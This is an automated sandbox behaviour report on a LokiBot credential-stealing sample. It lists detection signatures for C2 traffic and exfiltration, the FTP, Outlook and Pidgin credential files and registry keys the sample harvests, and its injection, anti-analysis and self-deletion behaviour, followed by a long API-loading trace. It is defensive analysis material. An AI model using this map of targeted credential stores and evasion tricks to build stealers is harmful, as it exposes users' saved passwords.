N}QO}{q
Sleep
bsS[$mr!b 7
gextrdd_vys{r
k(FN
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:20:30 | 2018-09-09 19:24:18 | 228 |
21 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN LokiBot User-Agent (Charon/Inferno)
- signature: ET TROJAN LokiBot Checkin
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M2
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
Attempts to repeatedly call a single API many times in order to delay analysis time
Severity: High
Confidence: Very High
- Spam: WmiPrvSE.exe (2056) called API GetSystemTimeAsFileTime 26872 times
- Spam: services.exe (476) called API GetSystemTimeAsFileTime 4519992 times
Spoofs its process name and/or associated pathname to appear as a legitimate process
Severity: High
Confidence: Very High
- original_path: C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe
- modified_name: trip2323232.exe
- original_name: TRIP2323232.exe
- modified_path: C:\Users\Seven01\AppData\Local\Temp\trip2323232.exe
Creates a hidden or system file
Severity: High
Confidence: Medium
- file: C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
- file: C:\Users\Seven01\AppData\Roaming\E62877
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
- file: C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
- file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
- key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
- key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Harvests information related to installed instant messenger clients
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
Harvests information related to installed mail clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Attempts to modify or disable Security Center warnings
Severity: High
Confidence: Very High
Collects information to fingerprint the system
Severity: High
Confidence: High
Deletes its original binary from disk
Severity: High
Confidence: Very High
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: TRIP2323232.exe(2288) -> TRIP2323232.exe(2548)
Uses Windows utilities for basic functionality
Severity: Medium
Confidence: High
- command: C:\Windows\system32\sc.exe start w32time task_started
- command: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
Creates RWX memory
Severity: Medium
Confidence: Medium
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
A process attempted to delay the analysis task.
Severity: Medium
Confidence: Very High
- Process: TRIP2323232.exe tried to sleep 842 seconds, actually delayed analysis time by 0 seconds
- Process: svchost.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionAndSpinCount
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: msvcrt.dll/_set_error_mode
- DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
- DynamicLoader: msvcrt.dll/_get_terminate
- DynamicLoader: KERNEL32.dll/FindActCtxSectionStringW
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: mscorwks.dll/SetLoadedByMscoree
- DynamicLoader: mscorwks.dll/_CorExeMain
- DynamicLoader: mscorwks.dll/GetCLRFunction
- DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
- DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
- DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
- DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
- DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
- DynamicLoader: ADVAPI32.dll/TraceEvent
- DynamicLoader: MSCOREE.DLL/IEE
- DynamicLoader: mscoreei.dll/IEE_RetAddr
- DynamicLoader: mscoreei.dll/IEE
- DynamicLoader: mscorwks.dll/IEE
- DynamicLoader: MSCOREE.DLL/GetStartupFlags
- DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
- DynamicLoader: mscoreei.dll/GetStartupFlags
- DynamicLoader: MSCOREE.DLL/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
- DynamicLoader: mscoreei.dll/GetCORVersion
- DynamicLoader: MSCOREE.DLL/GetCORSystemDirectory
- DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: ntdll.dll/RtlUnwind
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/AddVectoredContinueHandler
- DynamicLoader: KERNEL32.dll/RemoveVectoredContinueHandler
- DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
- DynamicLoader: shell32.dll/SHGetFolderPathW
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/GetWriteWatch
- DynamicLoader: KERNEL32.dll/ResetWriteWatch
- DynamicLoader: KERNEL32.dll/CreateMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
- DynamicLoader: ADVAPI32.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/CryptCreateHash
- DynamicLoader: ADVAPI32.dll/CryptDestroyHash
- DynamicLoader: ADVAPI32.dll/CryptHashData
- DynamicLoader: ADVAPI32.dll/CryptGetHashParam
- DynamicLoader: ADVAPI32.dll/CryptImportKey
- DynamicLoader: ADVAPI32.dll/CryptExportKey
- DynamicLoader: ADVAPI32.dll/CryptGenKey
- DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
- DynamicLoader: ADVAPI32.dll/CryptDestroyKey
- DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
- DynamicLoader: ADVAPI32.dll/CryptSignHashA
- DynamicLoader: ADVAPI32.dll/CryptGetProvParam
- DynamicLoader: ADVAPI32.dll/CryptGetUserKey
- DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
- DynamicLoader: MSCOREE.DLL/GetMetaDataInternalInterface
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface_RetAddr
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorwks.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorjit.dll/getJit
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetUserDefaultUILanguage
- DynamicLoader: KERNEL32.dll/SetErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
- DynamicLoader: mscoreei.dll/LoadLibraryShim
- DynamicLoader: culture.dll/ConvertLangIdToCultureName
- DynamicLoader: KERNEL32.dll/lstrlen
- DynamicLoader: KERNEL32.dll/lstrlenW
- DynamicLoader: MSCOREE.DLL/ND_RI4
- DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
- DynamicLoader: mscoreei.dll/ND_RI4
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: KERNEL32.dll/GlobalMemoryStatusEx
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: KERNEL32.dll/GetEnvironmentVariable
- DynamicLoader: KERNEL32.dll/GetEnvironmentVariableW
- DynamicLoader: KERNEL32.dll/SwitchToThread
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/GetCurrentProcessId
- DynamicLoader: KERNEL32.dll/GetCurrentProcessIdW
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/OpenProcess
- DynamicLoader: KERNEL32.dll/OpenProcessW
- DynamicLoader: psapi.dll/EnumProcessModules
- DynamicLoader: psapi.dll/EnumProcessModulesW
- DynamicLoader: psapi.dll/GetModuleInformation
- DynamicLoader: psapi.dll/GetModuleInformationW
- DynamicLoader: psapi.dll/GetModuleBaseName
- DynamicLoader: psapi.dll/GetModuleBaseNameW
- DynamicLoader: psapi.dll/GetModuleFileNameEx
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/DebugActiveProcess
- DynamicLoader: KERNEL32.dll/WaitForDebugEvent
- DynamicLoader: KERNEL32.dll/ContinueDebugEvent
- DynamicLoader: KERNEL32.dll/DeleteFileA
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: ADVAPI32.dll/SetKernelObjectSecurity
- DynamicLoader: ADVAPI32.dll/GetKernelObjectSecurity
- DynamicLoader: ntdll.dll/NtSetInformationProcess
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: ntdll.dll/NtProtectVirtualMemory
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/GetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64GetThreadContext
- DynamicLoader: ntdll.dll/NtUnmapViewOfSection
- DynamicLoader: KERNEL32.dll/ResumeThread
- DynamicLoader: KERNEL32.dll/SetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64SetThreadContext
- DynamicLoader: ntdll.dll/NtProtectVirtualMemory
- DynamicLoader: KERNEL32.dll/WriteProcessMemory
- DynamicLoader: KERNEL32.dll/ReadProcessMemory
- DynamicLoader: KERNEL32.dll/TerminateProcess
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/CreateProcessW
- DynamicLoader: KERNEL32.dll/CreateProcessWW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptCreateHash
- DynamicLoader: CRYPTSP.dll/CryptHashData
- DynamicLoader: CRYPTSP.dll/CryptGetHashParam
- DynamicLoader: CRYPTSP.dll/CryptDestroyHash
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: vaultcli.dll/VaultEnumerateItems
- DynamicLoader: vaultcli.dll/VaultEnumerateVaults
- DynamicLoader: vaultcli.dll/VaultFree
- DynamicLoader: vaultcli.dll/VaultGetItem
- DynamicLoader: vaultcli.dll/VaultOpenVault
- DynamicLoader: vaultcli.dll/VaultCloseVault
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: CRYPTSP.dll/CryptImportKey
- DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
- DynamicLoader: CRYPTSP.dll/CryptDecrypt
- DynamicLoader: CRYPTSP.dll/CryptDestroyKey
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
- DynamicLoader: RPCRT4.dll/UuidFromStringW
- DynamicLoader: radarrs.dll/WdiDiagnosticModuleMain
- DynamicLoader: radarrs.dll/WdiHandleInstance
- DynamicLoader: radarrs.dll/WdiGetDiagnosticModuleInterfaceVersion
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoInitializeSecurity
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: kernel32.dll/SortGetHandle
- DynamicLoader: kernel32.dll/SortCloseHandle
- DynamicLoader: fntcache.dll/ServiceMain
- DynamicLoader: fntcache.dll/SvchostPushServiceGlobals
- DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
- DynamicLoader: wkscli.dll/NetGetJoinInformation
- DynamicLoader: netutils.dll/NetApiBufferFree
- DynamicLoader: USERENV.dll/UnregisterGPNotification
- DynamicLoader: GPAPI.dll/UnregisterGPNotificationInternal
- DynamicLoader: ole32.dll/CoDisconnectContext
- DynamicLoader: dfdts.dll/DfdGetDefaultPolicyAndSMARTW
- DynamicLoader: dfdts.dll/DfdGetDefaultPolicyAndSMARTA
- DynamicLoader: dfdts.dll/DfdGetDefaultPolicyAndSMART
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: kernel32.dll/SortGetHandle
- DynamicLoader: kernel32.dll/SortCloseHandle
- DynamicLoader: sechost.dll/OpenSCManagerW
- DynamicLoader: sechost.dll/OpenServiceW
- DynamicLoader: sechost.dll/QueryServiceStatus
- DynamicLoader: sechost.dll/CloseServiceHandle
- DynamicLoader: cryptbase.dll/SystemFunction036
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: SspiCli.dll/GetUserNameExW
- DynamicLoader: pcwum.dll/PerfDeleteInstance
- DynamicLoader: pcwum.dll/PerfStopProvider
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: PROPSYS.dll/PropVariantToVariant
- DynamicLoader: ole32.dll/CoDisconnectObject
- DynamicLoader: wbemcore.dll/Shutdown
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: ole32.dll/CoDisconnectObject
- DynamicLoader: ole32.dll/CoReleaseMarshalData
- DynamicLoader: kernel32.dll/RegDeleteValueW
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
- DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
- DynamicLoader: kernel32.dll/LocaleNameToLCID
- DynamicLoader: kernel32.dll/GetLocaleInfoEx
- DynamicLoader: kernel32.dll/LCIDToLocaleName
